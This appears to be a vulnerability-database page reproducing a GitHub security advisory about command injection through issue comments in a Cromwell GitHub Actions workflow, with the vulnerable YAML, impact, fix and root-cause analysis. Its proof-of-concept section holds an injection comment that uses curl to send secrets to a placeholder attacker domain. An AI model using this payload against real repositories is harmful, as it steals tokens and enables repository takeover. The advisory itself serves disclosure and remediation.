9.1

CVSS Score

3.1

-

CVSS Score

Basic Information

CVE ID

GHSA ID

GHSA-phf6-hm3h-x8qp

EPSS Score

CWE

CWE-78

Published

5/28/2025

Updated

5/28/2025

KEV Status

Technology

GitHub Actions

Basic Information

CVE ID

GHSA ID

EPSS Score

CWE

Published

Updated

KEV Status

Technology

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

GHSA-phf6-hm3h-x8qp

GHSA-phf6-hm3h-x8qp: Cromwell GitHub Actions Secrets exfiltration via `Issue_comment`

Summary

Using Issue_comment on .github/workflows/scalafmt-fix.yml an attacker can inject malicious code using github.event.comment.body. By exploiting the vulnerability, it is possible to exfiltrate high privileged GITHUB_TOKEN which can be used to completely overtake the repo since the token has content privileges. In addition ,it is possible to exfiltrate also the secret:

BROADBOT_GITHUB_TOKEN

Details

The Issue_comment in GitHub Actions might be an injection path if the variable isn't handle as it should. In the following step it's vulnerable because it directly interpolates untrusted user input into a shell script.

      - name: Check for ScalaFmt Comment
        id: check-comment
        run: |
          if [[ "${{ github.event_name }}" == "issue_comment" && "${{ github.event.comment.body }}" == *"scalafmt"* ]]; then
            echo "::set-output name=comment-triggered::true"
          else
            echo "::set-output name=comment-triggered::false"
          fi

In this case, it is possible to exfiltrate GITHUB_TOKEN and BROADBOT_GITHUB_TOKEN secrets.

PoC

To exploit the vulnerability an attacker can just drop a comment to any issue formed in the following way to exploit the vulnerability in the workflow .github/workflows/update_pylon_issue.yml.

test" == "test" ]]; then
  & curl -s -d "$B64_BLOB" "https://$YOUR_EXFIL_DOMAIN/token" > /dev/null #

To prove this is possible, we created an issue and we added a comment with the malicious code to extract the GITHUB_TOKEN and BROADBOT_GITHUB_TOKEN secret. With the GITHUB_TOKEN extracted we were able to push a new poc tag which has been deleted after a couple of minutes.

Impact

Usually with GITHUB_TOKEN and write permissions, an attacker is able to completely overtake the repo.

GITHUB_TOKEN Permissions
  Actions: write
  Attestations: write
  Checks: write
  Contents: write
  Deployments: write
  Discussions: write
  Issues: write
  Metadata: read
  Models: read
  Packages: write
  Pages: write
  PullRequests: write
  RepositoryProjects: write
  SecurityEvents: write
  Statuses: write

We also checked BROADBOT_GITHUB_TOKEN permission to check if we could move laterally to org level. In this case the token seems scoped to this specific repo but it gives an attacker persistence without the need of a valid GITHUB_TOKEN. We suggest to rotate the BROADBOT_GITHUB_TOKEN token asap.

Fix

Avoid directly interpolating untrusted user input into a shell script. Use GitHub Actions input context safely like:

- name: Dump comment
  run: echo "Comment Body: $BODY"
  env:
    BODY: ${{ github.event.comment.body }}

This safely passes the comment as an environment variable rather than interpolating it in-place.

Scope GIHTUB_TOKEN permissions to just what the actions needs to do. In this case, if it's specific for issues:

permissions:
  issues: write

Kindly reported by @darryk10 @AlbertoPellitteri @loresuso

(GitHub Advisory)

Miggo Vulnerability Database

→

GHSA-phf6-hm3h-x8qp

GHSA-phf6-hm3h-x8qp:

9.1

CVSS Score

3.1

-

CVSS Score

Basic Information

CVE ID

GHSA ID

GHSA-phf6-hm3h-x8qp

EPSS Score

CWE

CWE-78

Published

5/28/2025

Updated

5/28/2025

KEV Status

Technology

GitHub Actions

Basic Information

CVE ID

GHSA ID

EPSS Score

CWE

Published

Updated

KEV Status

Technology

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
broadinstitute/cromwell	actions	>= 87, < 90	90

Technical Details

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability, GHSA-phf6-hm3h-x8qp, is a command injection flaw within the GitHub Actions workflow defined in .github/workflows/scalafmt-fix.yml of the broadinstitute/cromwell repository. The root cause is the direct interpolation of untrusted user input, specifically github.event.comment.body, into a shell script executed by the run command within the 'Check for ScalaFmt Comment' step. When a user comments on an issue, if the comment contained malicious shell commands formatted to exploit this interpolation, these commands would be executed on the GitHub Actions runner with the permissions of the GITHUB_TOKEN.

The provided commit dc2c26abd31149e296f73ce4e43a36c0c0317b0d remediates this specific vulnerability by removing the entire .github/workflows/scalafmt-fix.yml file, thereby eliminating the vulnerable step and script.

An attacker exploiting this vulnerability could exfiltrate sensitive secrets accessible to the workflow, such as the GITHUB_TOKEN (which had write permissions to the repository) and BROADBOT_GITHUB_TOKEN. This could lead to a full repository takeover or unauthorized modifications.

The analysis of the commit diff clearly shows the removal of the vulnerable run block, confirming its role in the vulnerability. While the vulnerability description mentions a PoC targeting .github/workflows/update_pylon_issue.yml, the provided commit only addresses the scalafmt-fix.yml file. Therefore, the identified vulnerable function is confined to the changes in this specific commit.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.

Reasoning

*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.

9.1

-

Basic Information

Basic Information

Concerned about an active attack path?

GHSA-phf6-hm3h-x8qp: Cromwell GitHub Actions Secrets exfiltration via `Issue_comment`

Summary

Details

PoC

Impact

Fix

GHSA-phf6-hm3h-x8qp:

9.1

-

Basic Information

Basic Information

Technical Details

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability IntelligenceMiggo AI

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

GHSA-phf6-hm3h-x8qp: Cromwell GitHub Actions Secrets exfiltration via `Issue_comment`

Summary

Details

PoC

Impact

Fix

9.1

9.1

Basic Information

Basic Information

Technical Details

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI